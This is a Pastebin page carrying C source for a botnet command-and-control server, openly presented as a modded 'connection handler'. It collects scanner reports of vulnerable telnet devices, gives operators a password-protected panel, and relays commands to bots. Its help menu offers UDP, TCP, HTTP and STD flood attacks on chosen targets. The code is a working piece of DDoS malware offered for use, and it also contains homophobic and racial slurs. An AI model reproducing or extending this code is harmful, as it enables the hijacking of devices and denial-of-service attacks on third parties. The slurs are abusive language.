Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
/* THIS IS THE OFFICIAL 'moist' CONNECTION HANDLER MODIFIED BY 'NFZB' MOST KNOW ME AS DADDY COUGH COUGH *Benz* ;) AN DONT FORGET IT */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <unistd.h> #include <time.h> #include <fcntl.h> #include <sys/epoll.h> #include <errno.h> #include <pthread.h> #include <signal.h> //////////////////////////////////// #define MY_MGM_PORT 420 //we must have the best h4x so 1337 obv #define Hax_Password "BotNetter101" //Change hoho! to the password you want //////////////////////////////////// #define MAXFDS 1000000 struct account { char id[20]; char password[20]; }; static struct account accounts[10]; struct clientdata_t { uint32_t ip; char build[7]; char connected; } clients[MAXFDS]; struct telnetdata_t { int connected; } managements[MAXFDS]; //////////////////////////////////// static volatile FILE *telFD; static volatile FILE *fileFD; static volatile int epollFD = 0; static volatile int listenFD = 0; static volatile int managesConnected = 0; static volatile int TELFound = 0; static volatile int scannerreport; //////////////////////////////////// int fdgets(unsigned char *buffer, int bufferSize, int fd) { int total = 0, got = 1; while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; } return got; } void trim(char *str) { int i; int begin = 0; int end = strlen(str) - 1; while (isspace(str[begin])) begin++; while ((end >= begin) && isspace(str[end])) end--; for (i = begin; i <= end; i++) str[i - begin] = str[i]; str[i - begin] = '\0'; } static int make_socket_non_blocking (int sfd) { int flags, s; flags = fcntl (sfd, F_GETFL, 0); if (flags == -1) { perror ("fcntl"); return -1; } flags |= O_NONBLOCK; s = fcntl (sfd, F_SETFL, flags); if (s == -1) { perror ("fcntl"); return -1; } return 0; } static int create_and_bind (char *port) { struct addrinfo hints; struct addrinfo *result, *rp; int s, sfd; memset (&hints, 0, sizeof (struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_flags = AI_PASSIVE; s = getaddrinfo (NULL, port, &hints, &result); if (s != 0) { fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s)); return -1; } for (rp = result; rp != NULL; rp = rp->ai_next) { sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (sfd == -1) continue; int yes = 1; if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt"); s = bind (sfd, rp->ai_addr, rp->ai_addrlen); if (s == 0) { break; } close (sfd); } if (rp == NULL) { fprintf (stderr, "Could not bind\n"); return -1; } freeaddrinfo (result); return sfd; } void broadcast(char *msg, int us, char *sender) { int sendMGM = 1; if(strcmp(msg, "PING") == 0) sendMGM = 0; char *wot = malloc(strlen(msg) + 10); memset(wot, 0, strlen(msg) + 10); strcpy(wot, msg); trim(wot); time_t rawtime; struct tm * timeinfo; time(&rawtime); timeinfo = localtime(&rawtime); char *timestamp = asctime(timeinfo); trim(timestamp); int i; for(i = 0; i < MAXFDS; i++) { if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue; if(sendMGM && managements[i].connected) { send(i, "\x1b[36m ", 7, MSG_NOSIGNAL); send(i, sender, strlen(sender), MSG_NOSIGNAL); send(i, "\x1b[32m Said\x1b[31m: \x1b[35m", 23, MSG_NOSIGNAL); } printf("sent to fd: %d\n", i); send(i, msg, strlen(msg), MSG_NOSIGNAL); if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[34m-> \x1b[0m", 14, MSG_NOSIGNAL); else send(i, "\n", 1, MSG_NOSIGNAL); } free(wot); } void *epollEventLoop(void *useless) { struct epoll_event event; struct epoll_event *events; int s; events = calloc (MAXFDS, sizeof event); while (1) { int n, i; n = epoll_wait (epollFD, events, MAXFDS, -1); for (i = 0; i < n; i++) { if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN))) { clients[events[i].data.fd].connected = 0; close(events[i].data.fd); continue; } else if (listenFD == events[i].data.fd) { while (1) { struct sockaddr in_addr; socklen_t in_len; int infd, ipIndex; in_len = sizeof in_addr; infd = accept (listenFD, &in_addr, &in_len); if (infd == -1) { if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break; else { perror ("accept"); break; } } clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr; int dup = 0; for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) { if(!clients[ipIndex].connected || ipIndex == infd) continue; if(clients[ipIndex].ip == clients[infd].ip) { dup = 1; break; } } if(dup) { printf("DUP Client - Terminating\n"); if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } close(infd); continue; } s = make_socket_non_blocking (infd); if (s == -1) { close(infd); break; } event.data.fd = infd; event.events = EPOLLIN | EPOLLET; s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event); if (s == -1) { perror ("epoll_ctl"); close(infd); break; } clients[infd].connected = 1; send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL); } continue; } else { int thefd = events[i].data.fd; struct clientdata_t *client = &(clients[thefd]); int done = 0; client->connected = 1; while (1) { ssize_t count; char buf[2048]; memset(buf, 0, sizeof buf); while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0) { if(strstr(buf, "\n") == NULL) { done = 1; break; } trim(buf); if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive { if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response continue; } if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan { char *line = strstr(buf, "REPORT ") + 7; fprintf(telFD, "%s\n", line); // let's write it out to disk without checking what it is! fflush(telFD); TELFound++; continue; } if(strstr(buf, "PROBING") == buf) { char *line = strstr(buf, "PROBING"); scannerreport = 1; continue; } if(strstr(buf, "REMOVING PROBE") == buf) { char *line = strstr(buf, "REMOVING PROBE"); scannerreport = 0; continue; } if(strcmp(buf, "PONG") == 0) { continue; } printf("buf: \"%s\"\n", buf); } if (count == -1) { if (errno != EAGAIN) { done = 1; } break; } else if (count == 0) { done = 1; break; } } if (done) { client->connected = 0; close(thefd); } } } } } unsigned int clientsConnected() { int i = 0, total = 0; for(i = 0; i < MAXFDS; i++) { if(!clients[i].connected) continue; total++; } return total; } void *titleWriter(void *sock) { int thefd = (int)sock; char string[2048]; while(1) { memset(string, 0, 2048); sprintf(string, "%c]0;Bots Counted: %d |-| !~Nullington HQ~! |-| Clients Online: %d%c", '\033', clientsConnected(), managesConnected, '\007'); if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return; sleep(2); } } int Search_in_File(char *str) { FILE *fp; int line_num = 0; int find_result = 0, find_line=0; char temp[512]; if((fp = fopen("login.txt", "r")) == NULL){ return(-1); } while(fgets(temp, 512, fp) != NULL){ if((strstr(temp, str)) != NULL){ find_result++; find_line = line_num; } line_num++; } if(fp) fclose(fp); if(find_result == 0)return 0; return find_line; } void *telnetWorker(void *sock) { char usernamez[80]; int thefd = (int)sock; int find_line; managesConnected++; pthread_t title; char counter[2048]; memset(counter, 0, 2048); char buf[2048]; char* nickstring; char* username; char* password; memset(buf, 0, sizeof buf); char botnet[2048]; memset(botnet, 0, 2048); if(send(thefd, "\x1b[33malias:\x1b[36m ", 23, MSG_NOSIGNAL) == -1) goto end; if(fdgets(buf, sizeof buf, thefd) < 1) goto end; trim(buf); sprintf(usernamez, buf); nickstring = ("%s", buf); if(send(thefd, "\x1b[34mpassword:\x1b[30m ", 25, MSG_NOSIGNAL) == -1) goto end; if(fdgets(buf, sizeof buf, thefd) < 1) goto end; trim(buf); if(strcmp(buf, Hax_Password) != 0) goto failed; memset(buf, 0, 2048); goto fak; failed: if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end; if(send(thefd, "\x1b[36m*************************************\r\n", 45, MSG_NOSIGNAL) == -1) goto end; if(send(thefd, "\x1b[35m* INVALID PASSWORD *\r\n", 45, MSG_NOSIGNAL) == -1) goto end; if(send(thefd, "\x1b[35m* FUCK OFF FAGGOT, LOGGED *\r\n", 45, MSG_NOSIGNAL) == -1) goto end; if(send(thefd, "\x1b[36m*************************************\r\n", 45, MSG_NOSIGNAL) == -1) goto end; sleep(5); goto end; fak: pthread_create(&title, NULL, &titleWriter, sock); char line1[80]; char line2[80]; char line3[80]; char line4[80]; char line5[80]; char line6[80]; char line7[80]; char line8[80]; char line9[80]; char line10[80]; sprintf(line1, "\x1b[36m********************************************\r\n"); sprintf(line2, "\x1b[32m* Welcome to Nullington HQ\r\n"); sprintf(line3, "\x1b[33m* Were all the nulls come true\r\n"); sprintf(line4, "\x1b[36m* Type \x1b[31mHELP\x1b[36m for \x1b[35mCOMMANDS\r\n"); sprintf(line5, "\x1b[36m********************************************\r\n\x1b[31m"); sprintf(line6, "\x1b[35m********************************************\r\n"); sprintf(line7, "\x1b[32m* Welcome to Nullington HQ\r\n"); sprintf(line8, "\x1b[33m* Were all the nulls come true\r\n"); sprintf(line9, "\x1b[35m* Type \x1b[31mHELP\x1b[35m for \x1b[36mCOMMANDS\r\n"); sprintf(line10, "\x1b[35m********************************************\r\n\x1b[31m"); if(send(thefd, line1, strlen(line1), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line2, strlen(line2), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line3, strlen(line3), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line4, strlen(line4), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line5, strlen(line5), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, "\r\n\x1b[32m-> \x1b[0m", 15, MSG_NOSIGNAL) == -1) goto end; pthread_create(&title, NULL, &titleWriter, sock); managements[thefd].connected = 1; while(fdgets(buf, sizeof buf, thefd) > 0) { if(strstr(buf, "STATUS")) { sprintf(botnet, "Telnet devices: %d | Telnet status: %d\r\n", TELFound, scannerreport); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "SHOW")) { sprintf(botnet, "\x1b[36mBots\x1b[32m: \x1b[35m%d \x1b[33m|\x1b[31m-\x1b[33m| \x1b[36mUsers\x1b[32m: \x1b[35m%d%c\x1b[37m\r\n", clientsConnected(), managesConnected); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[32m-------\x1b[31m Commands \x1b[32m-------\x1b[37m\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "CRED")) { sprintf(botnet, "\x1b[32mCredits to Snickers, S/O To LiGhT\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* UDP [\x1b[35mIP\x1b[37m] [\x1b[35mPort\x1b[37m] [\x1b[35mTime\x1b[37m] 32 0 10 -Attacks Target With a UDP Flood\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* TCP [\x1b[35mIP\x1b[37m] [\x1b[35mPort\x1b[37m] [\x1b[35mTime\x1b[37m] 32 all 0 10 -Attacks Target With a TCP Flood\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* HTTP [\x1b[35mURL\x1b[37m] [\x1b[35mTime\x1b[37m] -Attacks The Site With a HTTP Flood\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* STD [\x1b[35mIP\x1b[37m] [\x1b[35mPort\x1b[37m] [\x1b[35mTime\x1b[37m] -Attacks The Target With a STD Flood\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* SHOW -Shows the Bot and User count\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* KILLATTK -Kill All Attacks\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\x1b[37m!* CLEAR - Clears the screen\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "HELP")) { sprintf(botnet, "\r\n\x1b[37m"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "CREDITS")) { sprintf(botnet, "\x1b[31mModded By @OilDump, S/O To LiGhT\r\n"); if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return; } if(strstr(buf, "CLEAR")) { if(send(thefd, "\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line6, strlen(line6), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line7, strlen(line7), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line8, strlen(line8), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line9, strlen(line9), MSG_NOSIGNAL) == -1) goto end; if(send(thefd, line10, strlen(line10), MSG_NOSIGNAL) == -1) goto end; pthread_create(&title, NULL, &titleWriter, sock); managements[thefd].connected = 1; } trim(buf); if(send(thefd, "\x1b[32m-> \x1b[0m", 12, MSG_NOSIGNAL) == -1) goto end; if(strlen(buf) == 0) continue; printf("%s: \"%s\"\n",accounts[find_line].id, buf); FILE *logFile; logFile = fopen("server.log", "a"); fprintf(logFile, "%s: \"%s\"\n",accounts[find_line].id, buf); fclose(logFile); broadcast(buf, thefd, usernamez); memset(buf, 0, 2048); } end: // cleanup dead socket managements[thefd].connected = 0; close(thefd); managesConnected--; } void *telnetListener(void *useless) { int sockfd, newsockfd; socklen_t clilen; struct sockaddr_in serv_addr, cli_addr; sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) perror("ERROR opening socket"); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(MY_MGM_PORT); if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding"); listen(sockfd,5); clilen = sizeof(cli_addr); while(1) { newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen); if (newsockfd < 0) perror("ERROR on accept"); pthread_t thread; pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd); } } int main (int argc, char *argv[], void *sock) { signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel int s, threads; struct epoll_event event; printf("\x1b[33mScreening \x1b[35mhax \x1b[31mConnection \x1b[36mHandler\x1b[33m By \x1b[35mSnickers \x1b[32m- \x1b[33mEnjoy Faggot.\n"); telFD = fopen("telnet.txt", "a+"); threads = atoi(argv[2]); listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't if (listenFD == -1) abort (); s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't if (s == -1) abort (); s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't if (s == -1) { perror ("listen"); abort (); } epollFD = epoll_create1 (0); // make an epoll listener, die if we can't if (epollFD == -1) { perror ("epoll_create"); abort (); } event.data.fd = listenFD; event.events = EPOLLIN | EPOLLET; s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event); if (s == -1) { perror ("epoll_ctl"); abort (); } pthread_t thread[threads + 2]; while(threads--) { pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually } pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL); while(1) { broadcast("PING", -1, "NIGGER"); // ping bots every 60 sec on the main thread sleep(60); } close (listenFD); return EXIT_SUCCESS; }
Optional Paste Settings
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Tags:
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
MAGA250
1 hour ago | 1.48 KB
Nightlight - Imprisoning Pitch
10 hours ago | 0.54 KB
Ombric - Astral Projection
10 hours ago | 0.77 KB
Katherine/Nightlight - Reindeer
11 hours ago | 1.03 KB
Djinni - Swords
11 hours ago | 0.44 KB
Djinni - Limits
11 hours ago | 0.62 KB
Djinni - Throw
11 hours ago | 1.44 KB
Djinni - Boulders
11 hours ago | 0.49 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!